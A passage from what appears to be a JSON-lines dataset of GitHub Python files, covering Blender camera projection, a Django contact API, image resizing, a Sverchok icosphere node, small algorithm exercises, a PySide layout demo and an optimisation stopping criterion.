default is returned without any transformations applied.\n Create a new mesh object based on mesh_object and undo any transformations so that it is in the same space as the\n camera frame. Find the min/max vertex coordinates of the mesh visible in the frame, or None if the mesh is not in view.\n :param scene:\n :param camera_object:\n :param mesh_object:\n :return:\n \"\"\"\n\n \"\"\" Get the inverse transformation matrix. 
\"\"\"\n matrix = camera_object.matrix_world.normalized().inverted()\n \"\"\" Create a new mesh data block, using the inverse transform matrix to undo any transformations. \"\"\"\n dg = bpy.context.evaluated_depsgraph_get()\n \n ob = mesh_object.evaluated_get(dg) #this gives us the evaluated version of the object. Aka with all modifiers and deformations applied.\n mesh = ob.to_mesh()\n #mesh = mesh_object.to_mesh()\n mesh.transform(mesh_object.matrix_world)\n mesh.transform(matrix)\n\n \"\"\" Get the world coordinates for the camera frame bounding box, before any transformations. \"\"\"\n frame = [-v for v in camera_object.data.view_frame(scene=scene)[:3]]\n\n\n lx = []\n ly = []\n \n for v in mesh.vertices:\n co_local = v.co\n z = -co_local.z\n\n if z <= 0.0:\n \"\"\" Vertex is behind the camera; ignore it. \"\"\"\n continue\n else:\n \"\"\" Perspective division \"\"\"\n frame = [(v / (v.z / z)) for v in frame]\n \n min_x, max_x = frame[1].x, frame[2].x\n min_y, max_y = frame[0].y, frame[1].y\n \n x = (co_local.x - min_x) / (max_x - min_x)\n y = (co_local.y - min_y) / (max_y - min_y)\n lx.append(x)\n ly.append(y)\n \n mesh_object.to_mesh_clear()\n\n \"\"\" Image is not in view if all the mesh verts were ignored \"\"\"\n if not lx or not ly:\n return None\n\n min_x = np.clip(min(lx), 0.0, 1.0)\n min_y = np.clip(min(ly), 0.0, 1.0)\n max_x = np.clip(max(lx), 0.0, 1.0)\n max_y = np.clip(max(ly), 0.0, 1.0)\n\n \"\"\" Image is not in view if both bounding points exist on the same side \"\"\"\n if min_x == max_x or min_y == max_y:\n return None\n\n \"\"\" Figure out the rendered image size \"\"\"\n render = scene.render\n fac = render.resolution_percentage * 0.01\n dim_x = render.resolution_x * fac\n dim_y = render.resolution_y * fac\n\n return (min_x, min_y), (max_x, max_y)\n\n\n\n\n\n\n\n\ndef randomize_camera(x, y, z, roll=0, pitch=0, yaw=0):\n x = y\n y= x\n z = z\n \n\n pitch = pitch\n roll = roll\n yaw = randint(-yaw/2, yaw/2)\n \n fov = 50.0\n\n pi = 3.14159265\n print(bpy.data.scenes.keys())\n scene = bpy.data.scenes['Scene']\n\n # Set render resolution\n scene.render.resolution_x = 640\n scene.render.resolution_y = 640\n\n # Set camera fov in degrees\n scene.camera.data.angle = fov*(pi/180.0)\n\n # Set camera rotation in euler angles\n scene.camera.rotation_mode = 'XYZ'\n scene.camera.rotation_euler[0] = pitch*(pi/180.0)\n scene.camera.rotation_euler[1] = roll*(pi/180)\n scene.camera.rotation_euler[2] = yaw*(pi/180.0)\n\n # Set camera translation\n scene.camera.location.x = x\n scene.camera.location.y = y\n scene.camera.location.z = z\n update()\n return scene, scene.camera\n\n\ndef get_cordinates(scene, camera, object, filename):\n camera_object = camera\n bounding_box = camera_view_bounds_2d(scene, camera_object, object)\n \n cordinates = {\n 'image': filename,\n 'meshes': {}\n }\n if bounding_box:\n cordinates['meshes'][object.name] = {\n 'x1': bounding_box[0][0],\n 'y1': bounding_box[0][1],\n 'x2': bounding_box[1][0],\n 'y2': bounding_box[1][1]\n }\n return cordinates\n else:\n return None\ndef measure (first, second):\n\n locx = second[0] - first[0]\n locy = second[1] - first[1]\n locz = second[2] - first[2]\n\n distance = sqrt((locx)**2 + (locy)**2 + (locz)**2) \n return distance\n\n\ndef center_obj(obj_camera, point):\n print(point, \" [pooooiint\")\n loc_camera = obj_camera.matrix_world.to_translation()\n\n direction = point - loc_camera\n print(direction, \"diredctr\")\n # point the cameras '-Z' and use its 'Y' as up\n rot_quat = direction.to_track_quat('-Z', 'Y')\n 
print(rot_quat, rot_quat.to_euler(), \"quat\")\n # assume we're using euler rotation\n obj_camera.rotation_euler = rot_quat.to_euler()\n update()\n eulers = [degrees(a) for a in obj_camera.matrix_world.to_euler()]\n z = eulers[2]\n print(eulers, \"eulsers\")\n distance = measure(point, loc_camera)\n return distance, z\n\ndef percent_offset(distance, z, degrees):\n fov = 50 * .9\n width = 640\n\n new_yaw = 640 / distance / fov\n\n yaw = z + new_yaw\n scene = bpy.data.scenes['_mainScene']\n scene.camera.rotation_mode = 'XYZ'\n scene.camera.rotation_euler[2] = yaw*(pi/180.0)\n update()\n\ndef point_at(obj, target, roll=0):\n obj = obj.matrix_world.to_translation()\n \"\"\"\n Rotate obj to look at target\n\n :arg obj: the object to be rotated. Usually the camera\n :arg target: the location (3-tuple or Vector) to be looked at\n :arg roll: The angle of rotation about the axis from obj to target in radians. \n\n Based on: https://blender.stackexchange.com/a/5220/12947 (ideasman42) \n \"\"\"\n if not isinstance(target, mathutils.Vector):\n target = mathutils.Vector(target)\n #oc = obj.location\n loc = obj\n # direction points from the object to the target\n direction = target - loc\n \n quat = direction.to_track_quat('-Z', 'Y')\n\n # /usr/share/blender/scripts/addons/add_advanced_objects_menu/arrange_on_curve.py\n quat = quat.to_matrix().to_4x4()\n rollMatrix = mathutils.Matrix.Rotation(roll, 4, 'Z')\n\n # remember the current location, since assigning to obj.matrix_world changes it\n loc = loc.to_tuple()\n \n \n obj.matrix_world = quat * rollMatrix\n obj.location = loc\n\n\ndef offset(scene, camera, angle):\n \n angle = angle\n height = 640\n width = 640\n \n if width > height: \n ratio = height / width \n desired_x = (50 / 2) * (angle/100) * ratio\n desired_y = (50 / 2) * (angle/100) \n \n elif height > width:\n ratio = width / height \n desired_x = (50 / 2) * (angle/100)\n desired_y = (50 / 2) * (angle/100) * ratio\n else:\n desired_x = (50 / 2) * (angle/100)\n desired_y = (50 / 2) * (angle/100)\n \n scene.camera.rotation_mode = 'XYZ'\n x = scene.camera.rotation_euler[0]\n y = scene.camera.rotation_euler[2]\n \n change_x = x + (desired_x * (pi / 180.0))\n change_y = y + (desired_y * (pi / 180.0))\n #scene.camera.rotation_euler[0] = change_x \n #scene.camera.rotation_euler[2] = change_y \n update()\n \n\n\n\ndef world_to_camera_view(scene, obj, coord):\n \"\"\"\n Returns the camera space coords for a 3d point.\n (also known as: normalized device coordinates - NDC).\n Where (0, 0) is the bottom left and (1, 1)\n is the top right of the camera frame.\n values outside 0-1 are also supported.\n A negative 'z' value means the point is behind the camera.\n Takes shift-x/y, lens angle and sensor size into account\n as well as perspective/ortho projections.\n :arg scene: Scene to use for frame size.\n :type scene: :class:`bpy.types.Scene`\n :arg obj: Camera object.\n :type obj: :class:`bpy.types.Object`\n :arg coord: World space location.\n :type coord: :class:`mathutils.Vector`\n :return: a vector where X and Y map to the view plane and\n Z is the depth on the view axis.\n :rtype: :class:`mathutils.Vector`\n \"\"\"\n from mathutils import Vector\n print(obj, \"obj\")\n co_local = obj.matrix_world.normalized().inverted() @ coord\n z = -co_local.z\n print(z, \"zx\")\n camera = obj.data\n \n print(camera, \"cam cords\")\n frame = [-v for v in camera.view_frame(scene=scene)[:3]]\n print(frame, \"frame\")\n if camera.type != 'ORTHO':\n if z == 0.0:\n return Vector((0.5, 0.5, 0.0))\n else:\n frame = [(v / 
(v.z / z)) for v in frame]\n print(frame, \"frame 2\" )\n \n t = [(v * (v.z * z)) for v in frame]\n print(t, \" t\")\n min_x, max_x = frame[1].x, frame[2].x\n min_y, max_y = frame[0].y, frame[1].y\n\n x = (co_local.x - min_x) / (max_x - min_x)\n y = (co_local.y - min_y) / (max_y - min_y)\n\n return Vector((x, y, z))\ndef camera_to_world_view(scene, obj, coord):\n \"\"\"\n Returns the camera space coords for a 3d point.\n (also known as: normalized device coordinates - NDC).\n Where (0, 0) is the bottom left and (1, 1)\n is the top right of the camera frame.\n values outside 0-1 are also supported.\n A negative 'z' value means the point is behind the camera.\n Takes shift-x/y, lens angle and sensor size into account\n as well as perspective/ortho projections.\n :arg scene: Scene to use for frame size.\n :type scene: :class:`bpy.types.Scene`\n :arg obj: Camera object.\n :type obj: :class:`bpy.types.Object`\n :arg coord: World space location.\n :type coord: :class:`mathutils.Vector`\n :return: a vector where X and Y map to the view plane and\n Z is the depth on the view axis.\n :rtype: :class:`mathutils.Vector`\n \"\"\"\n from mathutils import Vector\n print(obj, \"obj\")\n co_local = obj.matrix_world.normalized().inverted() @ coord\n z = -co_local.z\n\n camera = obj.data\n \n frame = [-v for v in camera.view_frame(scene=scene)[:3]]\n if camera.type != 'ORTHO':\n if z == 0.0:\n return Vector((0.5, 0.5, 0.0))\n else:\n frame = [(v / (v.z / z)) for v in frame]\n\n min_x, max_x = frame[1].x, frame[2].x\n min_y, max_y = frame[0].y, frame[1].y\n\n x = (co_local.x - min_x) / (max_x - min_x)\n y = (co_local.y - min_y) / (max_y - min_y)\n\n return Vector((x, y, z))\n\n\nimport bpy_extras\nmonkey = bpy.data.objects[\"Cube\"]\n\nscene, camera = randomize_camera(0, 0, 0)\n\nscene = bpy.context.scene\n### \ndistance, z = center_obj(camera, monkey.matrix_world.to_translation())\n\n\n#offset(scene, camera, 90)\n\n\n\n\n#amera = bpy.data.objects[\"Camera\"]\n\n\n#co_2d = bpy_extras.object_utils.world_to_camera_view(scene, obj, monkey.location)\n#print(\"2D Coords:\", co_2d)\n\n## If you want pixel coords\n#render_scale = scene.render.resolution_percentage / 100\n#render_size = (\n# int(scene.render.resolution_x * render_scale),\n# int(scene.render.resolution_y * render_scale),\n#)\n#print(\"Pixel Coords:\", (\n# round(co_2d.x * render_size[0]),\n# round(co_2d.y * render_size[1]),\n#))\n\n\n\n#print(distance)\n#R = distance \n#d = 10\n\n#print(R, \"distance\")\n\n#x = sqrt((R**2)-(d**2))\n#print(x)\n\n\n \n \n\n# Test the function using the active object (which must be a camera)\n# and the 3D cursor as the location to find.\n\ndef update1(x):\n print(x, \"curent\")\n x = x / scene.render.resolution_x\n \n camera.rotation_mode = 'XYZ'\n \n x = camera.rotation_euler[2] + (x * (pi / 180.0))\n camera.rotation_euler[2] = x \n \n update()\n \n \n co_2d = bpy_extras.object_utils.world_to_camera_view(scene, obj, co)\n\n # If you want pixel coords\n render_scale = scene.render.resolution_percentage / 100\n \n render_size = (\n int(scene.render.resolution_x * render_scale),\n int(scene.render.resolution_y * render_scale),\n )\n x = round(co_2d.x * render_size[0])\n print(x, \"x cordinate\")\n return x\n#import bpy\n#import bpy_extras\n\nscene = bpy.context.scene\nobj = bpy.context.object\nco = monkey.location\n\n#pixels = 200\n\n#pid = PID(50, 0.01, 0.5, setpoint=pixels)\n#v = update1(pixels)\n#update1(0)\n\n\n#while True:\n# # compute new ouput from the PID according to the systems current value\n# control = 
pid(v)\n# print(control, \" control\" )\n# v = update1(control)\n# if pixels == v:\n# break\n\n\n\n\n#co_2d = camera_to_world_view(scene, obj, co)\n#print(\"3d Coords:\", co_2d)\n\n\n#obj = bpy.data.objects[\"Camera\"]\n#cube = bpy.data.objects[\"Cube\"]\n\n\n#angle = 2 # or pi/2\n#axis = [0,0,1] # the z axis\n#axis = cube.location.normalized().cross(obj.location.normalized())\n#print(axis)\n#qrot = Quaternion(axis,angle)\n\n\n\n#obj.rotation_mode = 'QUATERNION'\n#obj.rotation_quaternion = qrot # expects a quaternion\n\n\n#print(obj.location.angle(cube.location))\n#print(cube.location, obj.location)\n##.angle(mathutils.Vector((v1.x,v1.y,v1.z)))\n\n\n\n\n\nfrom mathutils import Matrix\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ndef get_calibration_matrix_K_from_blender(camd):\n f_in_mm = camd.lens\n scene = bpy.context.scene\n resolution_x_in_px = scene.render.resolution_x\n resolution_y_in_px = scene.render.resolution_y\n scale = scene.render.resolution_percentage / 100\n sensor_width_in_mm = camd.sensor_width\n sensor_height_in_mm = camd.sensor_height\n pixel_aspect_ratio = scene.render.pixel_aspect_x / scene.render.pixel_aspect_y\n if (camd.sensor_fit == 'VERTICAL'):\n # the sensor height is fixed (sensor fit is horizontal), \n # the sensor width is effectively changed with the pixel aspect ratio\n s_u = resolution_x_in_px * scale / sensor_width_in_mm / pixel_aspect_ratio \n s_v = resolution_y_in_px * scale / sensor_height_in_mm\n else: # 'HORIZONTAL' and 'AUTO'\n # the sensor width is fixed (sensor fit is horizontal), \n # the sensor height is effectively changed with the pixel aspect ratio\n pixel_aspect_ratio = scene.render.pixel_aspect_x / scene.render.pixel_aspect_y\n s_u = resolution_x_in_px * scale / sensor_width_in_mm\n s_v = resolution_y_in_px * scale * pixel_aspect_ratio / sensor_height_in_mm\n\n\n # Parameters of intrinsic calibration matrix K\n alpha_u = f_in_mm * s_u\n alpha_v = f_in_mm * s_v\n u_0 = resolution_x_in_px * scale / 2\n v_0 = resolution_y_in_px * scale / 2\n skew = 0 # only use rectangular pixels\n\n K = Matrix(\n ((alpha_u, skew, u_0),\n ( 0 , alpha_v, v_0),\n ( 0 , 0, 1 )))\n return K\n\nK = get_calibration_matrix_K_from_blender(camera.data)\ncoord = Vector([20, 2, 1]) \n5000\ncoord = Vector([-5000, -5000, 3]) \n\nprint(coord) # <Vector (-3.5007, -7.1511, 0.1595)>\n\ntt = K.inverted() @ coord \n\n\ncenter_obj(camera, tt)","repo_name":"Danny-Dasilva/Blender-ML","sub_path":"scripts/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":22904,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"54"} +{"seq_id":"31509849013","text":"\nfrom rent_property.models import ContactUs\nfrom rent_property.Serializers.ContactUsSerializer import ContactUsSerializer\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\n\n\nclass ContactUsView(APIView):\n def post(self, request):\n serializer = ContactUsSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=200)\n return Response(serializer.errors, status=422)\n\n\nclass ContactUsDetailedView(APIView):\n def get(self, request, pk):\n try:\n appartment_info = ContactUs.objects.get(id=pk)\n except Exception as e:\n return Response({\"detail\": str(e)}, status=422)\n\n serializer = ContactUsSerializer(appartment_info)\n return Response(serializer.data)\n\n def put(self, request, pk):\n try:\n contact_info = ContactUs.objects.filter(id=pk).first()\n except Exception as e:\n print(e)\n return 
Response({\"detail\": \"Id not found in data!\"}, status=422)\n\n request_data = request.data\n\n serializer = ContactUsSerializer(contact_info, data=request_data)\n\n if serializer.is_valid():\n serializer.save()\n\n return Response(serializer.data, status=200)\n else:\n return Response(serializer.errors, status=422)\n\n def delete(self, request, pk):\n if pk is not None:\n try:\n apartment_info = ContactUs.objects.get(id=pk)\n apartment_info.delete()\n except Exception as e:\n return Response({\"detail\": str(e)}, status=422)\n else:\n return Response({\"detail\": \"Contact ID not found in request\"}, status=422)\n\n return Response({\"detail\": \"Deleted Job Successfully!\"}, status=200)\n","repo_name":"ShafiUllahNiazi/Rent-a-property","sub_path":"rent_property/Views/ContactUsView.py","file_name":"ContactUsView.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24070489920","text":"# coding:utf-8\nfrom PIL import Image\nimport os\n\ndef compressImage(srcPath, dstPath):\n for filename in os.listdir(srcPath):\n if not os.path.exists(dstPath):\n os.makedirs(dstPath)\n\n srcFile = os.path.join(srcPath, filename)\n dstFile = os.path.join(dstPath, filename)\n print(srcFile)\n print(dstFile)\n\n if os.path.isfile(srcFile):\n sImage=Image.open(srcFile)\n w = 64\n h = 64\n dImage=sImage.resize((w, h), Image.ANTIALIAS)\n dImage.save(dstFile)\n print(dstFile + \"compressed succeeded\")\n\n if os.path.isdir(srcFile):\n compressImage(srcFile, dstFile)\n\n\nif __name__ == '__main__':\n # compressImage('D:/yc_projects/data/images/All_Images', 'D:/yc_projects/data/images/done_dcgan')\n compressImage('D:\\yc_projects\\\\face_dct\\\\face_dect', 'D:\\yc_projects\\\\face_dct\\\\face_dect64x64')\n","repo_name":"AskerYc/tensorflow_ps","sub_path":"zip_pct.py","file_name":"zip_pct.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36220646956","text":"\"\"\"\r\n Script: test_formater.py\r\n By: Shivani Gupta (L00171176)\r\n Tested: Python v3.10.7; Windows 11\r\n Date: 30th October, 2022\r\n\"\"\"\r\n\r\nimport unittest, formater\r\n\r\nclass TestFormater(unittest.TestCase):\r\n def test_lower(self):\r\n test_text = \"SHIVANI\"\r\n result = formater.convert_lower(test_text)\r\n self.assertEqual(result, \"shivani\")\r\n \r\n def test_upper(self):\r\n test_text = \"Shivani\"\r\n result = formater.convert_upper(test_text)\r\n self.assertEqual(result, \"SHIVANI\")\r\n\r\nif __name__ ==\"__main\":\r\n unittest.main()","repo_name":"l00171176/Python","sub_path":"Exercises_09/test_formater.py","file_name":"test_formater.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37776836230","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\nfrom math import pi, sqrt\nimport bpy\nfrom bpy.props import IntProperty, FloatProperty, BoolVectorProperty\nimport bmesh\nfrom mathutils import Matrix, Vector\n\nfrom sverchok.node_tree import SverchCustomTreeNode\nfrom sverchok.data_structure import updateNode\nfrom sverchok.utils.sv_bmesh_utils import numpy_data_from_bmesh\nfrom sverchok.utils.math import from_cylindrical\nfrom sverchok.utils.nodes_mixins.recursive_nodes import SvRecursiveNode\n\n# icosphere parameter rename on sept 13 2021 - this will allow both to exist.\n# https://github.com/blender/blender/commit/9b2b32a3338d873529a9b2c402feae4e9d25afdf\nold_icosphere = \"diameter=\" in bmesh.ops.create_icosphere.__doc__\nsize_param = \"diameter\" if old_icosphere else \"radius\"\n\n\ndef icosahedron_cylindrical(r):\n\n d = 2.0/sqrt(5)\n\n # Calculate icosahedron vertices in cylindrical coordinates\n vertices = []\n vertices.append((0, 0, r))\n for i in range(5):\n vertices.append((d*r, pi/5 + i*2*pi/5, 0.5*d*r))\n for i in range(5):\n vertices.append((d*r, i*2*pi/5, -0.5*d*r))\n vertices.append((0, 0, -r))\n\n edges = []\n for i in range(1,6):\n edges.append((0,i))\n for i in range(1,5):\n edges.append((i, i+1))\n edges.append((1,5))\n for i in range(1,6):\n edges.append((i, i+5))\n for i in range(1,5):\n edges.append((i, i+6))\n edges.append((5,6))\n for i in range(6,10):\n edges.append((i, i+1))\n edges.append((6,10))\n for i in range(6,11):\n edges.append((i, 11))\n\n faces = []\n for i in range(1,5):\n faces.append([0, i, i+1])\n faces.append([0, 5, 1])\n for i in range(1,5):\n faces.append([i, i+6, i+1])\n faces.append([1, 5, 6])\n for i in range(1,5):\n faces.append([i, i+5, i+6])\n faces.append([5, 10, 6])\n for i in range(6,10):\n faces.append([i+1, i, 11])\n faces.append([6, 10, 11])\n\n return vertices, edges, faces\n\ndef icosahedron(r):\n vertices, edges, faces = icosahedron_cylindrical(r)\n vertices = [from_cylindrical(rho, phi, z, 'radians') for rho, phi, z in vertices]\n return vertices, edges, faces\n\nclass SvIcosphereNode(SverchCustomTreeNode, bpy.types.Node, SvRecursiveNode):\n \"\"\"IcoSphere. [default]\n Subdivisions, min (0): [2]\n Radius, min (0): [1.0]\n \"\"\"\n\n bl_idname = 'SvIcosphereNode'\n bl_label = 'IcoSphere'\n bl_icon = 'MESH_ICOSPHERE'\n\n replacement_nodes = [('SphereNode', None, dict(Faces='Polygons'))]\n\n def set_subdivisions(self, value):\n # print(value, self.subdivisions_max)\n if value > self.subdivisions_max:\n self['subdivisions'] = self.subdivisions_max\n else:\n self['subdivisions'] = value\n return None\n\n def get_subdivisions(self):\n return self['subdivisions']\n\n subdivisions: IntProperty(\n name = \"Subdivisions\", description = \"How many times to recursively subdivide the sphere. min=0\",\n default=2, min=0,\n set = set_subdivisions, get = get_subdivisions,\n update=updateNode)\n\n subdivisions_max: IntProperty(\n name = \"Max. Subdivisions\", description = \"Maximum number of subdivisions available\",\n default = 5, min=2,\n update=updateNode)\n\n radius: FloatProperty(\n name = \"Radius\",\n default=1.0, min=0.0,\n update=updateNode, description=\"Sphere radius. 
min=0\")\n\n # list_match: EnumProperty(\n # name=\"List Match\",\n # description=\"Behavior on different list lengths, object level\",\n # items=list_match_modes, default=\"REPEAT\",\n # update=updateNode)\n out_np: BoolVectorProperty(\n name=\"Output Numpy\",\n description=\"Output NumPy arrays slows this node but may improve performance of nodes it is connected to\",\n default=(False, False, False),\n size=3, update=updateNode)\n\n def sv_init(self, context):\n self['subdivisions'] = 2\n\n self.inputs.new('SvStringsSocket', 'Subdivisions').prop_name = 'subdivisions'\n self.inputs.new('SvStringsSocket', 'Radius').prop_name = 'radius'\n\n self.outputs.new('SvVerticesSocket', \"Vertices\")\n self.outputs.new('SvStringsSocket', \"Edges\")\n self.outputs.new('SvStringsSocket', \"Faces\")\n\n def draw_buttons_ext(self, context, layout):\n layout.prop(self, \"subdivisions_max\")\n layout.prop(self, \"list_match\")\n layout.label(text=\"Output Numpy:\")\n r = layout.row(align=True)\n for i in range(3):\n r.prop(self, \"out_np\", index=i, text=self.outputs[i].name, toggle=True)\n\n def pre_setup(self):\n for s in self.inputs:\n s.nesting_level = 1\n s.pre_processing = 'ONE_ITEM'\n\n def process_data(self, params):\n out_verts = []\n out_edges = []\n out_faces = []\n\n\n for subdivisions, radius in zip(*params):\n if subdivisions == 0:\n # In this case we just return the icosahedron\n verts, edges, faces = icosahedron(radius)\n out_verts.append(verts)\n out_edges.append(edges)\n out_faces.append(faces)\n continue\n\n if subdivisions > self.subdivisions_max:\n subdivisions = self.subdivisions_max\n\n bm = bmesh.new()\n bmesh.ops.create_icosphere(\n bm, **{size_param: radius, \"subdivisions\": subdivisions})\n\n verts, edges, faces, _ = numpy_data_from_bmesh(bm, self.out_np)\n bm.free()\n\n out_verts.append(verts)\n out_edges.append(edges)\n out_faces.append(faces)\n\n return out_verts, out_edges, out_faces\n\n\ndef register():\n bpy.utils.register_class(SvIcosphereNode)\n\ndef unregister():\n bpy.utils.unregister_class(SvIcosphereNode)\n","repo_name":"nortikin/sverchok","sub_path":"nodes/generator/icosphere.py","file_name":"icosphere.py","file_ext":"py","file_size_in_byte":6559,"program_lang":"python","lang":"en","doc_type":"code","stars":2098,"dataset":"github-code","pt":"54"} +{"seq_id":"73638786723","text":"class Solution:\n def smallestSubarrays(self, nums: List[int]) -> List[int]:\n last_seen_bit = [0] * 30\n n = len(nums)\n smallest_subarrays = [0] * n\n for index in range(n - 1, -1, -1):\n for bit_index in range(30):\n if nums[index] & (1 << bit_index):\n last_seen_bit[bit_index] = index\n smallest_subarrays[index] = max(1, max(last_seen_bit) - index + 1)\n return smallest_subarrays","repo_name":"Haymanot-Demis/A2SV-Problems","sub_path":"smallest-subarrays-with-maximum-bitwise-or.py","file_name":"smallest-subarrays-with-maximum-bitwise-or.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22241591136","text":"def egcd(a, b):\n if b == 0:\n return a, 1, 0\n else:\n gcd, x, y = egcd(b, a % b)\n return gcd, y, x - (a // b) * y\n\n# Take user input for the number and modulus\na = int(input(\"Enter the number: \"))\nm = int(input(\"Enter the modulus: \"))\n\n# Find the GCD and Bezout's coefficients using the egcd function\ngcd, x, y = egcd(a, m)\n\n# Check if a is invertible modulo m\nif gcd != 1:\n print(a, \"is not invertible modulo\", m)\nelse:\n # Calculate the inverse using Bezout's 
coefficients\n    inverse = x % m\n    print(\"The inverse of\", a, \"modulo\", m, \"is\", inverse)\n","repo_name":"Munkhbadral1/MUST-SICT","sub_path":"F.NS250/lab2, 3 Number theorems /integer inverse.py","file_name":"integer inverse.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"12122324990","text":"import matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom matplotlib import style\nstyle.use('fivethirtyeight')\n\nfig = plt.figure()\nax1 = fig.add_subplot(1,1,1)\n\ndef animate(i):\n    graph_data = open('emotion.txt', 'r').read()\n    lines = graph_data.split('\\n')\n    xs = []\n    y_angry = []\n    y_fear = []\n    y_happy = []\n    y_sad = []\n    y_surprise = []\n    y_neutral = []\n    for line in lines:\n        if len(line) > 1:\n            time, angry, fear, happy, sad, surprise, neutral = line.split(',')\n            xs.append(time)\n            y_angry.append(angry)\n            y_fear.append(fear)\n            y_happy.append(happy)\n            y_sad.append(sad)\n            y_surprise.append(surprise)\n            y_neutral.append(neutral)\n\n    ax1.clear()\n    ax1.plot(xs, y_angry)\n    ax1.plot(xs, y_fear)\n    ax1.plot(xs, y_happy)\n    ax1.plot(xs, y_sad)\n    ax1.plot(xs, y_surprise)\n    ax1.plot(xs, y_neutral)\n\nani = animation.FuncAnimation(fig, animate, interval=1000)\nplt.show()\n","repo_name":"JostineHo/real-time_emotion_analyzer","sub_path":"live-plotting.py","file_name":"live-plotting.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"54"}
{"seq_id":"17061805154","text":"from PySide6.QtWidgets import (\n    QApplication, QMainWindow, QLabel, QHBoxLayout, QVBoxLayout, QWidget)\nimport sys\n\n\nclass Caja(QLabel):\n    def __init__(self, color):\n        super().__init__()\n        self.setStyleSheet(f\"background-color:{color}\")\n\n\nclass MainWindow(QMainWindow):\n    def __init__(self):\n        super().__init__()\n\n        # create different layouts to mix\n        layoutHor = QHBoxLayout()\n        layoutVer1 = QVBoxLayout()\n        layoutVer2 = QVBoxLayout()\n\n        # add a box at the start of layout 1\n        layoutHor.addWidget(Caja(\"green\"))\n        # then nest two vertical layouts\n        layoutHor.addLayout(layoutVer1)\n        layoutHor.addLayout(layoutVer2)\n\n        # add two boxes to the first vertical layout\n        layoutVer1.addWidget(Caja(\"blue\"))\n        layoutVer1.addWidget(Caja(\"red\"))\n\n        # add three boxes to the second vertical layout\n        layoutVer2.addWidget(Caja(\"orange\"))\n        layoutVer2.addWidget(Caja(\"magenta\"))\n        layoutVer2.addWidget(Caja(\"purple\"))\n\n        # create the dummy widget and assign it the horizontal layout\n        widget = QWidget()\n        widget.setLayout(layoutHor)\n\n        self.setCentralWidget(widget)\n\n\nif __name__ == \"__main__\":\n    app = QApplication(sys.argv)\n    window = MainWindow()\n    window.show()\n    sys.exit(app.exec_())\n","repo_name":"hektorprofe/curso-qt-pyside-udemy","sub_path":"Teoría/04 Formas de organización/4-3 Layouts anidados/programa.py","file_name":"programa.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"es","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"}
{"seq_id":"74732012961","text":"from paref.interfaces.moo_algorithms.blackbox_function import BlackboxFunction\nfrom paref.interfaces.moo_algorithms.stopping_criteria import StoppingCriteria\n\n\nclass MaxIterationsReached(StoppingCriteria):\n    \"\"\"Stopping criteria based on a maximal number of iterations\n\n    If a defined maximum of iterations is reached, this stopping criteria is met.\n\n    Examples\n    --------\n\n    
Initialize stopping criteria\n\n    >>> stopping_criteria = MaxIterationsReached(max_iterations=1)\n\n    Evaluate stopping criteria - since this is the first iteration the stopping criteria is not met\n\n    >>> stopping_criteria()\n    False\n\n    Since the max iterations (=1) are reached the stopping criteria is met\n\n    >>> stopping_criteria()\n    True\n\n    \"\"\"\n\n    def __init__(self, max_iterations: int = 50):\n        \"\"\"\n\n        Parameters\n        ----------\n        max_iterations : int\n            maximum number of iterations\n        \"\"\"\n        self._iteration_step = 0\n        self._max_iterations = max_iterations\n\n    def __call__(self, blackbox_function: BlackboxFunction) -> bool:\n        \"\"\"\n\n        Returns\n        -------\n        bool\n            true if the maximal iterations are reached and false otherwise\n\n\n        \"\"\"\n        if self._iteration_step < self._max_iterations:\n            self._iteration_step += 1\n            return False\n\n        else:\n            return True\n","repo_name":"nicolaipalm/paref","sub_path":"paref/moo_algorithms/stopping_criteria/max_iterations_reached.py","file_name":"max_iterations_reached.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
